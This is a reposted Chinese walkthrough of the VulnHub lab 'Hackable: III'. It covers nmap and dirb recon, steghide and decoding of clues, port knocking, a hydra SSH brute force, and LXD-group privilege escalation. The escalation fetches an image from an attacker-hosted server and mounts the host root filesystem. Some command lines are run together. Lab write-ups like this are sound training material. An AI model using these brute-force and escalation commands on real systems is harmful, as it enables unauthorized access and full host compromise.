iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >【VulnHub靶场】Hackable: III
  • 516
分享到

【VulnHub靶场】Hackable: III

安全php系统安全web安全网络安全 2023-08-31 11:08:29 516人浏览 薄情痞子
摘要

Step 1 在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集 Command used: > Step 2 通过扫描我们可以得知80端口是开启状态,访问后得到以下界面 查看其源代码

Step 1

在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集
在这里插入图片描述
Command used: << nmap -sV -p- 192.168.31.180 >>

Step 2

通过扫描我们可以得知80端口是开启状态,访问后得到以下界面
在这里插入图片描述
查看其源代码
在这里插入图片描述
我们可以得到一条注释

“Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com”
从中我们可以提取出几个有用的消息:
1.消息是dev_suport@hackable3.com发给jubiscleudo的,推测有jubiscleudo与hackable3用户
2.它的端口需要“敲开”
3.需要留意“.jpg”文件

在上方图片中,我们可以留意到还有一个a标签,指向另外一个界面
在这里插入图片描述
进入后是一个登陆界面
在这里插入图片描述
无论如何登陆,他都会跳转到login.PHP,并且显示源码
在这里插入图片描述
我们可以收集到有config.php这个界面与3.jpg这个图片,我们分别访问
config.php是这个:
在这里插入图片描述
告诉我们Mysql的root用户没有密码
3.jpg是一张这样的图片:
在这里插入图片描述
我们将图片保存下来
Command used: << wget http://192.168.31.180/3.jpg >>

这里我们需要用到一个图片隐写的工具steghide来对该图片进行分离
我们可以使用命令 apt install steghide来安装该工具
在这里插入图片描述
Command used: << steghide --extract -sf 3.jpg >>
安装完成后我们可以使用上方命令进行分离,在passphrase一栏中直接enter即可得到一个文件
在这里插入图片描述
经查看我们得到数字65535

Step 3

信息收集到这里还未结束,使用dirb工具扫描WEB
在这里插入图片描述
Command used: << dirb http://192.168.31.180 >>
在这里插入图片描述

访问backup,有一个Wordlist.txt,推测是密码文件
在这里插入图片描述
Command used: << wget http://192.168.31.180/backup/wordlist.txt >>
在这里插入图片描述
访问config,有一个1.txt,里面有串类似base64的字符串
在这里插入图片描述
尝试解开
在这里插入图片描述
Command used: << echo “MTAwMDA=”|base64 -d >>
得到数字10000
在这里插入图片描述
访问CSS,有一个2.txt,里面有一串编码
在这里插入图片描述
经查询该加密为brainfuck加密
在这里插入图片描述
bugku的ctf在线工具里面恰好也有该加解密的工具https://ctf.bugku.com/tool/brainfuck
解码后得到数字4444

Step 4

到此为止我们得到了三个数字:4444 10000 65535
这时我们需要这三个数字来敲开22端口!
我们使用apt install knockd来安装knock工具
在这里插入图片描述
Command used: << knock -v 192.168.31.180 10000 4444 65535 >>
我们按照这个顺序敲开22端口,有关knock相关细节请查阅官方文档,这里不过多赘述

Step 5

在这里插入图片描述

Command used: << hydra -l jubiscleudo -P wordlist.txt ssh://192.168.31.180 >>
然后我们通过九头蛇工具爆破jubiscleudo的密码
通过账号密码登录ssh
在这里插入图片描述

查看html目录下有一个隐藏文件,在里面我们可以看到hackable_3用户的密码
在这里插入图片描述
我们使用账号密码登录上hackable_3用户,查看它的所在组,发现116(lxd)

Step 6

我们将利用lxd组来进行提取,参考文章:https://blog.csdn.net/YouthBelief/article/details/123548739

攻击机操作

通过git将构建好的alpine镜像克隆至本地;

git clone https://GitHub.com/saghul/lxd-alpine-builder.git

执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成;

cd lxd-alpine-builder   sudo ./build-alpine

在这里插入图片描述
3.将tar文件发送至目标设备,下载好后 启动python Http访问 ;

python3 -m http.server 80

靶机操作

下载攻击机上的最新的apline包,注意是最新那份

wget http://192.168.31.244/alpine-v3.16-x86_64-20221107_0401.tar.gz

在这里插入图片描述
2.导入镜像并初始化镜像

lxc image import ./alpine-v3.16-x86_64-20221107_0401.tar.gz --alias testlxc init test test -c security.privileged=true

在这里插入图片描述
运行到第二条报错,提示创建存储库,我们需要先初始化

lxd init    #一路回车

在这里插入图片描述

我们再运行回第二条命令

lxc init test test -c security.privileged=true #初始化镜像

在这里插入图片描述
3.挂载磁盘

lxc config device add test test disk source=/ path=/mnt/root recursive=true

启动镜像并进入镜像访问任意文件

lxc start testlxc exec test /bin/shidcd /mnt/rootls

在这里插入图片描述
结束游戏

来源地址:https://blog.csdn.net/EC_Carrot/article/details/127745183

--结束END--

本文标题: 【VulnHub靶场】Hackable: III

本文链接: https://www.lsjlt.com/news/385542.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • 【VulnHub靶场】Hackable: III
    Step 1 在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集 Command used: > Step 2 通过扫描我们可以得知80端口是开启状态,访问后得到以下界面 查看其源代码...
    99+
    2023-08-31
    安全 php 系统安全 web安全 网络安全
  • 【VulnHub靶场】——MONEYBOX: 1
    作者名:Demo不是emo  主页面链接:主页传送门创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,中后期主要是经验和能力的提高,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程...
    99+
    2023-09-08
    服务器 网络安全 web安全 安全
  • vulnhub靶场之Black-Widow-final
    1.信息收集 探测存活主机,发现192.168.239.177存活 对目标主机192.168.239.177进行端口扫描,发现存活22、80、111、2049、3128等端口 在浏览器中访问htt...
    99+
    2023-09-08
    php apache 安全
  • vulnhub靶场Matrix-Breakout 2 Morpheus教程
    靶场搭建 靶机下载地址:Matrix-Breakout: 2 Morpheus ~ VulnHub 直接解压双击ova文件即可 使用软件:VMware(可能会出现问题),VirtualBox(此处官方建议使用VirtualBox)...
    99+
    2023-10-28
    网络安全 安全 系统安全 web安全 Powered by 金山文档
  • vulnhub靶机sar
    准备工作 下载连接:https://download.vulnhub.com/sar/sar.zip 下载完后解压,然后双击打开,VMware导入OVA 网络环境:DHCP、NAT 信息收集 主机发现 先扫描整个C段 192.168.10...
    99+
    2023-09-08
    php 安全 网络安全
  • VulnHub-DarkHole_1靶机详细渗透教程
    1.靶机部署 kali安装:https://blog.csdn.net/l2872253606/article/details/123592717spm=1001.2014.3001.5502 靶机下...
    99+
    2023-08-31
    linux
  • 靶机渗透练习Vulnhub DriftingBlues-6
    攻击机ip 192.168.159.88 扫描主机 arp-scan -I eth0 -l  得到靶机ip: 192.168.159.144 扫描端口 nmap -sS -A -sV -T4 -p- 192.168.159.144 ...
    99+
    2023-09-10
    php 安全 网络 web安全
  • DVWA靶场
    目录 靶场简介 搭建DVWA靶场 1.下载phpstaudy  2. 下载DVWA ​编辑 错误提示修改  PHP function display_startup_errors: disabled PHP function allow_u...
    99+
    2023-09-04
    网络安全
  • pikachu靶场打靶分析
    目录: 下载phpstudy_pro xss漏洞介绍       反射性xss(get)       存储型xss       dom型xss漏洞(在前端处理)       dom型xss-x漏洞 xss漏洞获取cook...
    99+
    2023-09-18
    php 开发语言 web安全 linux 安全性测试
  • AWD靶场场景复现
    AWD靶场场景复现 ** 00x1-万能密码 ** 第一步万能密码登入 ** 00x2-d盾扫描 ** ** 00x3-sql注入 ** 00x4-文件上传 1.上传失败 2.原因:无文件,连...
    99+
    2023-09-01
    php 安全 web安全
  • DVWA靶场搭建
    ** ** 搭建DVWA 靶场 1.环境搭建 phpstudy是一个能够提供php建站集成化服务的一款软件。如果我们要搭建一个Web服务,我们需要需要满足4个条件: 1.操作系统【windows,l...
    99+
    2023-09-20
    php apache java
  • 红日靶场(一)
    红一 环境搭建 1. 实验环境拓扑如下: 2. 下载好镜像文件,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G,需要百度网盘会员) 3. 需要模拟内网和外网两个...
    99+
    2023-10-21
    php 数据库 开发语言
  • 搭建DVWA靶场
    搭建DVWA靶场 @Author by 白也白泽 一、DVWA简介:        DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴...
    99+
    2023-09-29
    linux 服务器 centos
  • Vulnstack靶场实战(一)
    搭建好靶场后 包括win7的web端,还有win2003为域成员,域控为win2008 win7内网ip:192.168.157.153 外网ip:192.168.52.143 域成员 win2003...
    99+
    2023-09-26
    php 安全 服务器
  • sqli-labs靶场分析
    sqli-labs靶场分析 1、level1 单引号测试报错,为单引号闭合,且显示1多了个单引号故而为字符型注入。且未对用户输入进行任何过滤。 且SQL语句错误会输出,可以使用报错注入 orde...
    99+
    2023-10-06
    sql web安全 网络安全
  • Sql-labs靶场(1~28)
    文章目录 简介Less-1 '闭合Less-2 数字型无闭合字符Less-3 ')闭合Less-4 ")闭合Less-5报错注入 '闭合Less-6报错注入"闭合Less-7写马注入Less-...
    99+
    2023-09-18
    sql 数据库 mysql 网络安全
  • sqli-laba靶场搭建
    目录 windows下搭建sqli-laba 安装phpstudy 下载sqli-laba 部署sqli-laba linux搭建sqli-labs(docker搭建) 搭建sqli-laba windows下搭建sqli-laba 环...
    99+
    2023-09-05
    php 数据库 mysql
  • VauditDemo靶场代码审计
    靶场搭建 将下载好的VAuditDemo_Debug目录复制到phpstudy的www目录下,然后将其文件名字修改成VAuditDemo,当然你也可以修改成其他的 运行phpstudy并且访问in...
    99+
    2023-09-06
    php 网络安全 web安全 网络攻击模型
  • 搭建一个pikachu靶场
    今天我们来学习搭建一个pikachu的web靶场 首先我们来下载源代码 开源源代码链接:https://github.com/zhuifengshaonianhanlu/pikachu  然后我们来搭建靶场 我这里使用小皮面板进行快速搭建...
    99+
    2023-09-04
    apache php 开发语言 安全
  • XAMPP、phpstudy搭建DVWA靶场
    一、实验目的  1.用PHP开发环境集成工具XAMPP搭建DVWA靶场。 2.用PHP开发环境集成工具phpstudy搭建DVWA靶场。 二、实验原理 XAMPP 是一款跨平台的 PHP 开发环境工具,集成了Apache、MySQL、PHP...
    99+
    2023-09-16
    前端 数据库 php apache 网络安全
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作